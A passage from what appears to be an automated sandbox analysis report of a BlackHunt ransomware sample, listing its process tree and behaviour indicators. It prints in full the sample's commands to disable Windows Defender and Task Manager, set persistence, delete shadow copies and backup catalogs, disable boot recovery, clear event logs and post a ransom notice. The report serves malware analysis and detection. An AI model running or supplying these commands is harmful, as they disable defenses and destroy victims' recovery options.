4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 113 PID 4352 wrote to memory of 1628 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 113 PID 4352 wrote to memory of 4628 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 120 PID 4352 wrote to memory of 4628 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 120 PID 4352 wrote to memory of 2184 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 115 PID 4352 wrote to memory of 2184 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 115 PID 3744 wrote to memory of 2616 3744 cmd.exe 119 PID 3744 wrote to memory of 2616 3744 cmd.exe 119 PID 4304 wrote to memory of 4796 4304 cmd.exe 118 PID 4304 wrote to memory of 4796 4304 cmd.exe 118 PID 4352 wrote to memory of 316 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 197 PID 4352 wrote to memory of 316 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 197 PID 1396 wrote to memory of 5012 1396 cmd.exe 123 PID 1396 wrote to memory of 5012 1396 cmd.exe 123 PID 4352 wrote to memory of 1640 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 124 PID 4352 wrote to memory of 1640 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 124 PID 4352 wrote to memory of 1760 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 125 PID 4352 wrote to memory of 1760 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 125 PID 1628 wrote to memory of 3012 1628 cmd.exe 127 PID 1628 wrote to memory of 3012 1628 cmd.exe 127 PID 4352 wrote to memory of 2768 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 129 PID 4352 wrote to memory of 2768 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 129 PID 4352 wrote to memory of 560 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 130 PID 4352 wrote to memory of 560 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 130 PID 2184 wrote to memory of 5044 2184 cmd.exe 134 PID 2184 wrote to memory of 5044 2184 cmd.exe 134 PID 4628 wrote to memory of 4008 4628 cmd.exe 133 PID 4628 wrote to memory of 4008 4628 cmd.exe 133 PID 316 wrote to memory of 564 316 cmd.exe 194 PID 316 wrote to memory of 564 316 cmd.exe 194 PID 4352 wrote to memory of 3720 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 136 PID 4352 wrote to memory of 3720 4352 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe 136 PID 560 wrote to memory of 3680 560 cmd.exe 138 PID 560 wrote to memory of 3680 560 cmd.exe 138 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe"C:\Users\Admin\AppData\Local\Temp\734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4352 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2824
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:1104
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:3744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:4796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:5012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:5044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:316
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:3268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1760
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2768
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3720
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4684
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:3040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4916
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2364
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1296
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:712
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1264
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3844
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1816
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:2744
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:4388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe" /F2⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\734a0a644e110c3692e53bae8946ea83828e66f62cc6c91fe0e7f8141a669dd2.exe" /F3⤵
- Creates scheduled task(s)
PID:4884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2848
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4828
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2628
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:6420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2740
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3164
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:564
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:8872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1228
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1392
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:9152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:5956
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:4140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:5544
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:12448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:8604
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:10520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:7052
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:4440
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1128
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1132
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:11060
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4404
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:6252
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:7608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1816
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5856
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:6184
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:14124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:6884
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:14176
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:13968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:6208
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:7596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:6608
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:4916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:13804
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:14252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:7204
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:5264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:10236
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:5600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:8656
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:5304 -
